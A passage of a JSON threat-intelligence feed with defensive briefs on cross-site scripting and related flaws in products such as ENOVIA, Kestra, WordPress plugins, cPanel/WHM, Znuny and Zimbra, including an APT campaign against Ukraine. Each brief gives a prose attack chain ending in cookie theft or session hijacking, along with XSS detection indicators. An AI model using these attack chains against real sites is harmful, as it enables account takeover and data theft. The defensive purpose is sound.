(CVE-2025-10553)","url":"https://feed.craftedsignal.io/briefs/2026-04-delmia-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.7,"id":"CVE-2025-10551"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","cve-2025-10551","enovia"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2025-10551 is a stored XSS vulnerability affecting the Document Management feature within ENOVIA Collaborative Industry Innovator. This vulnerability exists in versions from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x. A successful exploit allows an attacker to inject malicious JavaScript code into the application, which is then executed within the browser of any user who interacts with the compromised data.  This poses a significant risk to data confidentiality and…\u003c/p\u003e\n","date_modified":"2026-03-31T09:16:21Z","date_published":"2026-03-31T09:16:21Z","id":"/briefs/2026-03-enovia-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in ENOVIA Collaborative Industry Innovator allows an attacker to execute arbitrary script code in a user's browser session by injecting malicious code into document management functions.","title":"ENOVIA Collaborative Industry Innovator Stored XSS Vulnerability (CVE-2025-10551)","url":"https://feed.craftedsignal.io/briefs/2026-03-enovia-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.1,"id":"CVE-2026-32734"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","vulnerability","basercms"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ebaserCMS, a website development framework, is susceptible to DOM-based cross-site scripting (XSS) attacks in versions prior to 5.2.3. This vulnerability, identified as CVE-2026-32734, arises from the improper neutralization of input during the creation of tags. An attacker can exploit this by injecting malicious JavaScript code into the DOM, which is then executed in the victim\u0026rsquo;s browser when they interact with the crafted web page. Successful exploitation can lead to session hijacking…\u003c/p\u003e\n","date_modified":"2026-03-31T01:18:26Z","date_published":"2026-03-31T01:18:26Z","id":"/briefs/2026-04-basercms-xss/","summary":"baserCMS versions prior to 5.2.3 are vulnerable to DOM-based Cross-Site Scripting (XSS) due to improper neutralization of input during web page generation, potentially allowing a remote attacker to execute arbitrary JavaScript in a user's browser.","title":"baserCMS DOM-Based Cross-Site Scripting Vulnerability (CVE-2026-32734)","url":"https://feed.craftedsignal.io/briefs/2026-04-basercms-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["openbao","vulnerability","security-bypass","xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOpenBao is susceptible to multiple vulnerabilities that can be exploited by unauthenticated remote attackers. The vulnerabilities allow attackers to bypass existing security measures and inject malicious scripts into the application, leading to Cross-Site Scripting (XSS) attacks. The exact versions affected are not specified in the provided source, but it is crucial to investigate all OpenBao deployments for potential exposure. Successful exploitation could lead to unauthorized access, data theft, or other malicious activities within the OpenBao environment. Defenders need to prioritize identifying and mitigating these vulnerabilities to prevent potential attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable OpenBao instance accessible remotely.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting an endpoint susceptible to security bypass.\u003c/li\u003e\n\u003cli\u003eThe vulnerable OpenBao instance processes the crafted request, failing to properly enforce access controls.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to sensitive resources or functionality.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker crafts a malicious payload containing JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the malicious payload into a vulnerable input field or parameter within OpenBao.\u003c/li\u003e\n\u003cli\u003eThe OpenBao application stores or reflects the malicious payload without proper sanitization.\u003c/li\u003e\n\u003cli\u003eWhen a user interacts with the injected payload, the malicious JavaScript code executes in their browser, potentially leading to session hijacking or data theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities can lead to significant security breaches. An attacker bypassing security measures could gain unauthorized access to sensitive data stored within OpenBao or manipulate configurations. The XSS vulnerabilities allow attackers to inject malicious scripts that can compromise user accounts, steal sensitive information, or deface the application. The number of potential victims depends on the scope of the OpenBao deployment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect OpenBao web server logs for suspicious HTTP requests containing unusual parameters or patterns that may indicate attempts to bypass security measures to activate the rule \u003ccode\u003eDetect OpenBao Security Bypass Attempts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eExamine OpenBao web server logs for unusual patterns indicative of XSS attacks, such as \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tags or \u003ccode\u003ejavascript:\u003c/code\u003e URIs in request parameters with rule \u003ccode\u003eDetect OpenBao Cross-Site Scripting Attempts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor OpenBao web server logs for HTTP requests returning unexpected status codes (e.g., 3xx, 4xx, 5xx) in response to specific requests, which might indicate attempts to exploit vulnerabilities by enabling webserver logging.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-30T10:15:54Z","date_published":"2026-03-30T10:15:54Z","id":"/briefs/2026-03-openbao-vulns/","summary":"An anonymous, remote attacker can exploit multiple vulnerabilities in OpenBao to bypass security measures or conduct cross-site scripting attacks.","title":"OpenBao Multiple Vulnerabilities Allow Security Bypass and XSS","url":"https://feed.craftedsignal.io/briefs/2026-03-openbao-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["kestra","xss","cve-2026-33664","orchestration"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eKestra, an open-source, event-driven orchestration platform, is vulnerable to a reflected cross-site scripting (XSS) vulnerability, identified as CVE-2026-33664. This flaw resides in versions up to and including 1.3.3. The application fails to properly sanitize user-supplied flow YAML metadata fields, specifically \u003ccode\u003edescription\u003c/code\u003e, \u003ccode\u003einputs[].displayName\u003c/code\u003e, and \u003ccode\u003einputs[].description\u003c/code\u003e. These fields are rendered through the \u003ccode\u003eMarkdown.vue\u003c/code\u003e component with \u003ccode\u003ehtml: true\u003c/code\u003e, resulting in unsanitized HTML…\u003c/p\u003e\n","date_modified":"2026-03-27T12:00:00Z","date_published":"2026-03-27T12:00:00Z","id":"/briefs/2026-03-kestra-xss/","summary":"Kestra versions up to 1.3.3 are vulnerable to a cross-site scripting (XSS) vulnerability (CVE-2026-33664) allowing arbitrary JavaScript execution by viewing crafted flow metadata.","title":"Kestra Orchestration Platform XSS Vulnerability (CVE-2026-33664)","url":"https://feed.craftedsignal.io/briefs/2026-03-kestra-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","ory-polis","cve-2026-33506","cloud"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOry Polis, formerly known as BoxyHQ Jackson, is a service that bridges or proxies SAML login flows to OAuth 2.0 or OpenID Connect. A DOM-based Cross-Site Scripting (XSS) vulnerability has been identified in versions of Ory Polis prior to 26.2.0. This vulnerability arises from the application\u0026rsquo;s improper trust of the \u003ccode\u003ecallbackUrl\u003c/code\u003e URL parameter within its login functionality. An attacker can exploit this by crafting a malicious link containing JavaScript code within the \u003ccode\u003ecallbackUrl\u003c/code\u003e. When a…\u003c/p\u003e\n","date_modified":"2026-03-26T19:17:05Z","date_published":"2026-03-26T19:17:05Z","id":"/briefs/2024-01-ory-polis-xss/","summary":"Ory Polis versions prior to 26.2.0 are vulnerable to DOM-based XSS due to improper handling of the `callbackUrl` parameter, allowing attackers to execute arbitrary JavaScript in a user's browser.","title":"Ory Polis DOM-based XSS Vulnerability (CVE-2026-33506)","url":"https://feed.craftedsignal.io/briefs/2024-01-ory-polis-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["wordpress","xss","cve-2026-2231"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-2231 describes a stored cross-site scripting (XSS) vulnerability within the Fluent Booking WordPress plugin. This vulnerability affects all versions up to and including 2.0.01. The root cause is insufficient input sanitization and output escaping of multiple parameters handled by the plugin. An unauthenticated attacker can exploit this vulnerability to inject malicious JavaScript code into the WordPress site. The injected script executes in the context of the victim\u0026rsquo;s browser when they access the page containing the injected code, potentially leading to session hijacking, defacement, or other malicious activities. Successful exploitation grants the attacker the same privileges as the victim user.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker identifies a vulnerable parameter within the Fluent Booking plugin, specifically related to booking data.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker submits a request to the WordPress site with the crafted payload embedded within the vulnerable parameter (e.g., booking name, location, or other fields).\u003c/li\u003e\n\u003cli\u003eThe WordPress server stores the malicious payload in the database due to insufficient sanitization.\u003c/li\u003e\n\u003cli\u003eA legitimate user (e.g., an administrator or another user viewing bookings) accesses a page displaying the stored booking data.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript code embedded in the booking data is rendered in the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe injected script executes in the context of the user\u0026rsquo;s session.\u003c/li\u003e\n\u003cli\u003eThe attacker can potentially steal cookies, redirect the user to a malicious website, or perform other actions with the user\u0026rsquo;s privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability allows an unauthenticated attacker to execute arbitrary JavaScript code in the context of a logged-in user\u0026rsquo;s browser. This can lead to account compromise, including administrator accounts, potentially leading to full control of the WordPress website. Website defacement, data theft, and redirection to phishing sites are also potential impacts. Given the widespread use of WordPress and the Fluent Booking plugin, a successful widespread exploit could affect a large number of websites.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Fluent Booking plugin to a version greater than 2.0.01 to patch CVE-2026-2231.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious URI Parameters in WordPress\u003c/code\u003e to detect potential XSS attempts against WordPress sites.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious URI parameters and user input, as detected by the \u003ccode\u003eDetect WordPress XSS via URI Parameters\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) with rules to filter out common XSS payloads.\u003c/li\u003e\n\u003cli\u003eRegularly audit and sanitize user input within WordPress plugins and themes to prevent stored XSS vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T14:16:09Z","date_published":"2026-03-26T14:16:09Z","id":"/briefs/2026-03-fluentbooking-xss/","summary":"The Fluent Booking plugin for WordPress is vulnerable to stored cross-site scripting (XSS) allowing unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected page, affecting versions up to and including 2.0.01.","title":"Fluent Booking WordPress Plugin Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-fluentbooking-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","plugin","cve-2026-4329"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Blackhole for Bad Bots plugin for WordPress, up to and including version 3.8, contains a stored cross-site scripting (XSS) vulnerability. The vulnerability stems from insufficient input sanitization and output escaping of the User-Agent HTTP header when capturing bot data. Specifically, the plugin uses \u003ccode\u003esanitize_text_field()\u003c/code\u003e which strips HTML tags but does not escape HTML entities. This data is then stored using \u003ccode\u003eupdate_option()\u003c/code\u003e and later displayed on the Bad Bots log page. The stored data is output into HTML input value attributes and HTML span content without proper escaping via \u003ccode\u003eesc_attr()\u003c/code\u003e or \u003ccode\u003eesc_html()\u003c/code\u003e. This allows an unauthenticated attacker to inject arbitrary web scripts that are executed when an administrator views the Blackhole Bad Bots admin page, potentially leading to privilege escalation or other malicious actions.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker sends a request to the WordPress site with a malicious User-Agent header containing XSS payload.\u003c/li\u003e\n\u003cli\u003eThe Blackhole for Bad Bots plugin captures the User-Agent string using \u003ccode\u003esanitize_text_field()\u003c/code\u003e, which inadequately sanitizes the input.\u003c/li\u003e\n\u003cli\u003eThe plugin stores the inadequately sanitized User-Agent string in the WordPress options database using \u003ccode\u003eupdate_option()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eA WordPress administrator navigates to the Blackhole Bad Bots admin page.\u003c/li\u003e\n\u003cli\u003eThe plugin retrieves the stored User-Agent strings from the database.\u003c/li\u003e\n\u003cli\u003eThe plugin outputs the stored User-Agent string directly into HTML input value attributes (lines 75-83) without \u003ccode\u003eesc_attr()\u003c/code\u003e and into HTML span content without \u003ccode\u003eesc_html()\u003c/code\u003e on the admin page.\u003c/li\u003e\n\u003cli\u003eThe administrator\u0026rsquo;s browser executes the injected XSS payload.\u003c/li\u003e\n\u003cli\u003eThe XSS payload can perform actions such as stealing the administrator\u0026rsquo;s session cookie, redirecting the administrator to a malicious site, or performing actions on behalf of the administrator.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows unauthenticated attackers to inject arbitrary web scripts that execute in the context of an administrator\u0026rsquo;s browser session. This can lead to various malicious outcomes, including account takeover, data theft, and defacement of the WordPress site. Given the widespread use of WordPress and the Blackhole for Bad Bots plugin, a successful exploit could impact a significant number of websites.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Blackhole for Bad Bots plugin to a version greater than 3.8 to remediate CVE-2026-4329.\u003c/li\u003e\n\u003cli\u003eImplement a Web Application Firewall (WAF) rule to filter requests containing suspicious User-Agent headers that might exploit CVE-2026-4329.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests with unusual or potentially malicious User-Agent strings to detect potential exploitation attempts related to CVE-2026-4329.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-26T05:16:40Z","date_published":"2026-03-26T05:16:40Z","id":"/briefs/2024-01-11-wordpress-blackhole-xss/","summary":"The Blackhole for Bad Bots WordPress plugin through version 3.8 is vulnerable to stored cross-site scripting (XSS) via the User-Agent HTTP header, allowing unauthenticated attackers to inject arbitrary web scripts that execute when an administrator views the plugin's admin page.","title":"Blackhole for Bad Bots WordPress Plugin Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-11-wordpress-blackhole-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cPanel","WHM","XSS","SSRF","vulnerability"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in cPanel/WHM, a widely used web hosting control panel. An anonymous, remote attacker can exploit these vulnerabilities to compromise cPanel/WHM installations. The vulnerabilities allow an attacker to bypass security measures, perform Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) attacks, disclose sensitive information, and potentially execute arbitrary code on the server. These vulnerabilities pose a significant risk to organizations relying on cPanel/WHM for web hosting, potentially leading to data breaches, service disruption, and unauthorized access to sensitive systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable cPanel/WHM instance exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request exploiting an identified SSRF vulnerability to probe internal network resources.\u003c/li\u003e\n\u003cli\u003eSuccessful SSRF exploitation allows the attacker to identify internal services and gather information about the server architecture.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages an XSS vulnerability by injecting malicious JavaScript code into a cPanel/WHM page.\u003c/li\u003e\n\u003cli\u003eUnsuspecting users interacting with the compromised page execute the attacker\u0026rsquo;s JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the XSS payload to steal user session cookies or credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to bypass authentication and gain unauthorized access to cPanel/WHM.\u003c/li\u003e\n\u003cli\u003eWith elevated privileges, the attacker can potentially execute arbitrary code on the server, leading to full system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities can lead to severe consequences. An attacker could gain unauthorized access to sensitive data, including customer databases, configuration files, and source code. XSS attacks could deface websites and phish users. SSRF attacks can expose internal network resources. Remote code execution can lead to complete server takeover and potentially impact a large number of hosted websites and services. This can result in significant financial losses, reputational damage, and legal liabilities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious cPanel/WHM HTTP Request\u003c/code\u003e to identify potential SSRF attempts within cPanel/WHM webserver logs.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect cPanel/WHM XSS Attempt\u003c/code\u003e to detect potential XSS payloads being injected into cPanel/WHM.\u003c/li\u003e\n\u003cli\u003eClosely monitor web server logs for unusual activity originating from cPanel/WHM servers using the \u003ccode\u003ewebserver\u003c/code\u003e category.\u003c/li\u003e\n\u003cli\u003eImplement strong input validation and output encoding to prevent XSS attacks.\u003c/li\u003e\n\u003cli\u003eHarden cPanel/WHM configurations to restrict SSRF attack vectors and limit access to internal resources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:11:04Z","date_published":"2026-03-24T12:11:04Z","id":"/briefs/2026-03-cpanel-vulns/","summary":"An anonymous remote attacker can exploit multiple vulnerabilities in cPanel/WHM to bypass security measures, perform XSS and SSRF attacks, disclose information, and potentially execute code.","title":"Multiple Vulnerabilities in cPanel/WHM","url":"https://feed.craftedsignal.io/briefs/2026-03-cpanel-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["znuny","xss","cross-site scripting","web application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA vulnerability exists in Znuny, a web-based ticketing system, that can be exploited by an unauthenticated, remote attacker. The specific nature of the vulnerability is Cross-Site Scripting (XSS). Successful exploitation could allow the attacker to inject malicious scripts into the web pages served by Znuny. These scripts could then be executed in the context of other users\u0026rsquo; browsers, potentially leading to session hijacking, information disclosure, or defacement of the Znuny interface. Given the wide use of ticketing systems in enterprise environments, this vulnerability poses a risk to organizations using Znuny. The vendor should be consulted for patch information.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Znuny endpoint susceptible to XSS. This could be a form field, URL parameter, or other user-controlled input.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing JavaScript code designed to execute in the victim\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the payload into the vulnerable Znuny endpoint. This can be done through a crafted URL or form submission.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses the compromised Znuny endpoint.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the malicious JavaScript code injected by the attacker.\u003c/li\u003e\n\u003cli\u003eThe malicious script steals the user\u0026rsquo;s session cookie or other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session cookie to authenticate as the victim user.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to the victim\u0026rsquo;s Znuny account and performs malicious actions, such as viewing sensitive tickets, modifying configurations, or escalating privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability in Znuny could lead to unauthorized access to sensitive information stored within the ticketing system. This could include customer data, internal communications, and security-related information. The impact could range from minor information disclosure to complete compromise of the Znuny installation, depending on the privileges of the compromised user. The number of victims depends on the user base of the affected Znuny instance.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect web server logs for unusual patterns in HTTP requests targeting the Znuny application. Focus on requests containing suspicious characters commonly used in XSS attacks (\u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e, \u003ccode\u003eonerror\u003c/code\u003e, \u003ccode\u003ejavascript:\u003c/code\u003e, etc.) as detailed in the \u003ccode\u003eDetect Suspicious Znuny URL Parameters\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding mechanisms within the Znuny application to prevent XSS attacks.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections originating from the Znuny server, potentially indicating data exfiltration after successful XSS exploitation, leveraging the \u003ccode\u003eDetect Znuny Process Outbound Network Activity\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eConsult the Znuny vendor\u0026rsquo;s website or security advisories for available patches and apply them immediately.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T10:35:57Z","date_published":"2026-03-24T10:35:57Z","id":"/briefs/2026-03-znuny-xss/","summary":"An anonymous remote attacker can exploit a vulnerability in Znuny to perform a cross-site scripting attack, potentially leading to information disclosure or session hijacking.","title":"Znuny Cross-Site Scripting Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-znuny-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","connect-cms","cabinet-plugin"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA DOM-based Cross-Site Scripting (XSS) vulnerability has been identified in the Cabinet Plugin of Connect-CMS. This vulnerability affects versions 1.35.0 through 1.41.0 of the 1.x series and versions 2.35.0 through 2.41.0 of the 2.x series. Discovered by Sho Odagiri of GMO Cybersecurity by Ierae, Inc., the flaw resides in the Cabinet Plugin\u0026rsquo;s list view, stemming from the rendering of saved names. Exploitation requires an attacker to authenticate and access the affected functionality. Successful exploitation allows arbitrary script execution within the victim\u0026rsquo;s browser, potentially leading to unauthorized actions, such as session hijacking, or information theft. Organizations using the Connect-CMS Cabinet Plugin are urged to update to versions 1.41.1 or 2.41.1 to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the Connect-CMS application with valid credentials.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the Cabinet Plugin list view.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious payload containing JavaScript code.\u003c/li\u003e\n\u003cli\u003eAttacker saves a new cabinet or modifies an existing cabinet\u0026rsquo;s name, injecting the malicious payload into the name field.\u003c/li\u003e\n\u003cli\u003eThe application saves the cabinet name with the injected XSS payload.\u003c/li\u003e\n\u003cli\u003eWhen a victim user views the Cabinet Plugin list view, the malicious payload is rendered in their browser without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the injected JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains the ability to perform actions on behalf of the victim, such as stealing cookies or redirecting to a malicious website.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can allow an attacker to execute arbitrary JavaScript code in the victim\u0026rsquo;s browser. This could lead to session hijacking, where the attacker gains control of the victim\u0026rsquo;s account. Sensitive information, such as authentication tokens or personal data, could be stolen. The attacker could also redirect the victim to a phishing site or deface the Connect-CMS installation.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Connect-CMS to version 1.41.1 or 2.41.1 to patch the XSS vulnerability (CVE-2026-32277).\u003c/li\u003e\n\u003cli\u003eImplement a Web Application Firewall (WAF) rule to detect and block common XSS payloads in requests to the Cabinet Plugin list view.\u003c/li\u003e\n\u003cli\u003eEnable strict Content Security Policy (CSP) headers to prevent the execution of inline JavaScript and mitigate the impact of potential XSS attacks.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding on the Cabinet Plugin\u0026rsquo;s name field to prevent the injection of malicious code.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-23T20:35:48Z","date_published":"2026-03-23T20:35:48Z","id":"/briefs/2024-01-03-connect-cms-xss/","summary":"A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the Cabinet Plugin list view of Connect-CMS, affecting versions 1.35.0 to 1.41.0 and 2.35.0 to 2.41.0, which can lead to arbitrary script execution in the victim's browser.","title":"Connect-CMS Cabinet Plugin DOM-based XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-03-connect-cms-xss/"},{"_cs_actors":["Russian APT"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["zimbra","xss","ukraine","apt"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eA Russian APT group is conducting a campaign, known as \u0026ldquo;Operation GhostMail,\u0026rdquo; targeting the Ukrainian government. The attackers are leveraging a cross-site scripting (XSS) vulnerability in Zimbra collaboration suite to gain unauthorized access. While the specific vulnerability (CVE) is not provided in the source material, the attackers are clearly focused on exploiting this weakness. The operation highlights the ongoing cyber conflict impacting Ukraine. Defenders need to focus on detecting exploitation attempts against Zimbra and anomalous activity originating from compromised email accounts. The scope of this campaign appears limited to the Ukrainian government sector.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Zimbra server within the Ukrainian government infrastructure.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious email containing a specially crafted XSS payload.\u003c/li\u003e\n\u003cli\u003eThe victim receives the email and opens it within the Zimbra webmail client.\u003c/li\u003e\n\u003cli\u003eThe XSS payload executes within the victim\u0026rsquo;s browser, allowing the attacker to steal the victim\u0026rsquo;s Zimbra session cookie.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session cookie to authenticate to the Zimbra webmail client as the victim.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to the victim\u0026rsquo;s email account, contacts, and calendar.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised email account to send further phishing emails to other targets within the Ukrainian government, escalating the attack.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive information from the compromised mailboxes and possibly pivots to other internal systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis campaign is focused on espionage and potential disruption of Ukrainian government operations. Successful exploitation leads to unauthorized access to sensitive email communications, contact lists, and calendar information. Compromised email accounts can be used to spread further phishing attacks within the government, increasing the scope of the breach. The exfiltration of sensitive data can lead to reputational damage and compromise of national security.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Zimbra Webmail Activity\u003c/code\u003e to your SIEM and tune for your environment to identify unusual actions within the Zimbra webmail interface.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual connections originating from Zimbra servers, which can be indicative of post-exploitation activity, using the \u003ccode\u003eDetect Zimbra Server Outbound Connections\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for all Zimbra accounts to mitigate the impact of stolen credentials.\u003c/li\u003e\n\u003cli\u003eConduct regular security audits of Zimbra installations to identify and patch any known vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-20T05:20:03Z","date_published":"2026-03-20T05:20:03Z","id":"/briefs/2026-03-ghostmail/","summary":"A Russian APT group is exploiting a Zimbra XSS vulnerability (details unspecified) to target the Ukrainian government in an operation dubbed 'GhostMail'.","title":"Operation GhostMail: Russian APT Exploiting Zimbra XSS to Target Ukraine Government","url":"https://feed.craftedsignal.io/briefs/2026-03-ghostmail/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["xss","vulnerability","affine"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA cybersecurity researcher discovered two critical XSS vulnerabilities in AFFiNE, a self-hosted alternative to Notion, which has 66k stars on GitHub. The vulnerabilities include a reflected XSS in the \u003ccode\u003e/image-proxy\u003c/code\u003e endpoint and a stored XSS vulnerability in bookmark cards. The \u003ccode\u003e/image-proxy\u003c/code\u003e endpoint vulnerability allows unauthenticated users to fetch arbitrary URLs and reflect the URL headers in the response, potentially leaking internal IP 